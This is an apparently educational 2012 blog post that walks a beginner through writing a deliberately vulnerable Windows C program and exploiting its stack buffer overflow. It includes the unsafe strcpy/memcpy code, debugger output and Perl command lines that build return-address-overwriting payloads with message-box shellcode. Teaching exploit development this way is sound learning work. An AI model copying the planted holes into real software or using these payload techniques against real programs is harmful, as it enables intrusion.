Hurdles for a beginner to exploit a simple vulnerability on modern Windows

09 Dec 2012

tl;dr This is basically a guide for newbies to the world of "vulnerability research" (exploit development), and shows how hard it is to get the simple exploit samples from books and tutorials to work on modern Windows using a modern compiler. This is just for fun to show all the pain points you are likely to encounter. I want to show that the simple examples you find in tutorials no longer work, and I manipulate a vulnerable app to get it to a point where it can exploited with a classic/simple buffer overflow without knowledge of any more advanced exploitation concepts.

I am not good at exploit development: Pros will likely see some dumb mistakes on my part (some of which are on purpose to show what a newbie would likely do). I don't yet have a Windows 8 system, or the latest Visual Studio (VS 2012 which was official released on September 12, 2012). On my Windows 7 x64 system, I have Visual Studio 2010. So I start by creating a default empty project.

First write some vulnerable code

This is actually a little difficult if you want to just go by what the books say. Let's start with code from two popular books. You have almost the same example on page 24 of both "The Shellcoders Handbook, 1st edition" and "Hacking the Art of Exploitation, 1st edition". This is the most basic vulnerability for a stack overflow (with headers for Windows compilation).

#include <string.h>
#include <stdio.h>

int main(int argc, char **argv) {
    char little_array[4];
    strcpy(little_array,argv[1]);
}

It compiles, but you get a warning about using strcpy:

c:\users\simpleuser\documents\visual studio 2010\projects\test\test\test.cpp(7): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
1>          c:\program files (x86)\microsoft visual studio 10.0\vc\include\string.h(105) : see declaration of 'strcpy'

Running it with test.exe a works with no problems, it just exits, like it should, but try test.exe aaaaaaaa and it shows an error:

So looks like there are some protections, but we'll get to those later. The default build from Visual Studio is the debug build which you don't want to send to customers normally, so switch to the release build and recompile, and it exits fine. That's not what we expected.

Getting it to crash

Let's look at the assembly:

The strcpy has been compiled as:

.text:00401010                         loc_401010:                             ; CODE XREF: main+15j
.text:00401010 8A 08                                   mov     cl, [eax]
.text:00401012 40                                      inc     eax
.text:00401013 84 C9                                   test    cl, cl
.text:00401015 75 F9                                   jnz     short loc_401010

What is happening here is each byte of argv[1] is being copied to ecx register (cl), and if it is zero then the loop escapes, but it never writes these bytes anywhere. It just checks them so this was compiled to completely pointless code. This makes sense, because we aren't using the little_array var, so the compiler could have just skipped this entirely.

So let's use the little_array var by changing our code to this:

char little_array[4];
    strcpy(little_array,argv[1]);
    printf("%s", little_array);

Now when we run test.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA it just prints AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA and exits. No overflow. What happened this time?

This time our strcpy is actually doing something:

.text:00401010                         loc_401010:                             ; CODE XREF: sub_401000+18j
.text:00401010 8A 08                                   mov     cl, [eax]
.text:00401012 88 0C 02                                mov     [edx+eax], cl
.text:00401015 40                                      inc     eax
.text:00401016 84 C9                                   test    cl, cl
.text:00401018 75 F6                                   jnz     short loc_401010

But the data is not going to be copied over our return address, as shown here in this windbg session.

Knowing that we need to overwrite a return address, let's change our code so it uses a function.

#include <string.h>
#include <stdio.h>

void overflow(char *str) {
    char little_array[4];
    strcpy(little_array,str);
    printf(little_array);
}

int main(int argc, char **argv) {
    overflow(argv[1]);
}

This is basically the code from the appendix of "A Bug Hunter's Diary" on page 150 (except his code doesn't have the printf). Running again, it still doesn't crash! Looking in IDA, we can see the function was inlined, so we got almost the same code as before.

Ok, so now redefine our function so it won't be inlined:

__declspec(noinline) void overflow(char *str) {

This time it finally crashes!

Looking at IDA, we can see things were compiled how we expected now.

Nothing so far was any sort of protection mechanism by Windows, I just wanted to show all the problems you'll probably run into if you try to exploit something compiled with a modern Visual Studio.

Going from crashable to exploitable

Now we can crash our application, but can we exploit it? This is the situation reached by many vulnerability analysts today. They can crash an app, and maybe that allows for a remote Denial of Service attack, but no one really get's too proud for finding a crash. You want arbitrary code execution!

So you open up windbg and run your program with the argument AAAABBBBCCCCDDDDEEEEFFFF in order to figure out which one controls the return address, and windbg gives you:

(2378.1c30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
43434343 ??              ???

So if you change the CCCC part of your argument you can control the return address. Where to send it to? Well, the standard method is to include your shellcode with input so you'll probably bring up cygwin and do something like:

$ ./test.exe "AAAABBBB`perl -e 'printf("\x61\x61\x61\x61")'``cat w32-msgbox-shellcode-esp.bin`"

w32-msgbox-shellcode-esp.bin just pop's a "hello world" message box.

The goal here is to set that \x61\x61\x61\x61 (aaaa) to the start of the shellcode.

But it will just print out the argument like nothing happened. Why didn't it pop up the message "test.exe has stopped working"? I have no idea honestly. The program crashed, but Cygwin somehow disables werfault.exe from popping up the crash message. But you can try to debug all this via windbg and it will still show you the error. To make this happen, you'll need to attach to your bash.exe process and in windbg give the following command to debug child processes, and then when you try to crash test.exe you'll end up having about a dozen breakpoints hit (indicating a new process is starting) and eventually test.exe will run, and cause the "Access Violation".

.childdbg 1

Using cygwin and windbg like that is annoying, so you could try echo'ing your desired argument value to a file with:

$ echo "AAAABBBB`perl -e 'printf("\x61\x61\x61\x61")'``cat w32-msgbox-shellcode-esp.bin`" > file.txt

Then in your cmd.exe prompt do:

set /p MYARG=<file.txt
test.exe "%MYARG%"

Or do something else, just one way of doing it.

So now you try to set that \x61\x61\x61\x61 to the address of the start of your shellcode, but then you realize every time you run your program that the address to the start of your shellcode changes location. This is ASLR, and you know DEP is going to break it too, so to exploit you need to disable DEP and ASLR when you compile it.

Now you find that your shellcode is always at the address 0x003d2bc1 (this may vary), but now the first byte of that address is 0x00 which breaks the strcpy.

In the real world, this would now require you to find a sequence of executable code somewhere in memory that does not have a null, which somehow gets you back to your shellcode. For example, by some miracle you might find something like this:

pop ebx
pop eax
xor eax, 0xff000000
push eax
push ebx
ret

Let's say this was at location: 0x41424344 (ABCD), and knowing that 0x003d2bc1 (the location of your shellcode) xor'd with 0xff000000 is 0xff3d2bc1, this would then allow you to set up your input as (note that the addresses are reversed):

$ echo "AAAABBBB`perl -e 'printf("\xc1\x2b\x3d\xff")'`DCBA`cat w32-msgbox-shellcode-esp.bin`

Since we are just trying to learn exploit development, the other option, for us, is to just change our code. :)

#include <string.h>
#include <stdio.h>

__declspec(noinline) void overflow(char *str, int size) {
    char little_array[4];
    memcpy(little_array,str,size);
    printf("%s", little_array);
}

int main(int argc, char **argv) {
    char str[256];
    fgets(str, sizeof(str), stdin);
    
    int length = 0;
    for (; length<sizeof(str)-1; length++) {
        if (str[length]=='\n') break;
    }
    str[length]=0;

    overflow(str, length+1);
}

This new code just reads data in from stdin, and then there is a little length calculation that you can ignore (as long as your input does not have a \n (0x0a) character).

Now, because we will have a null in our input, we need to change how we create the input. In cygwin do:

perl -e 'printf("AAAABBBB\x40\xfe\x18\x00")' > file.txt
cat w32-msgbox-shellcode-esp.bin >> file.txt

Now to try to exploit your app, run this from a dos command prompt:

type file.txt | test.exe

(type is the DOS equivalent of cat)

So you try running it, and it doesn't work, and you debug it and it looks like your shellcode isn't getting read all the way. The reason why is the 0x1a character in the shellcode breaks the input. This has nothing to do with the 0x0a restriction from the length calculation. So you need to change your code again so it will call _setmode.

#include <string.h>
#include <stdio.h>
#include <io.h>
#include <fcntl.h>

__declspec(noinline) void overflow(char *str, int size) {
    char little_array[4];
    memcpy(little_array,str,size);
    printf("%s", little_array);
}

int main(int argc, char **argv) {
    _setmode(_fileno(stdin), _O_BINARY);

    char str[256];
    fgets(str, sizeof(str), stdin);
    
    int length = 0;
    for (; length<sizeof(str)-1; length++) {
        if (str[length]=='\n') break;
    }
    str[length]=0;

    overflow(str, length+1);
}

Now finally it works! You may need to change the address value, but it should finally pop up "hello world" message.

Summary

Use that last version of the code and turn off DEP and ASLR. This code looks weird, but it's not weird because it's bypassing compiler protections or anything: It just looks weird because of Windows and compiler oddities. Who knew writing vulnerable code was so hard? :)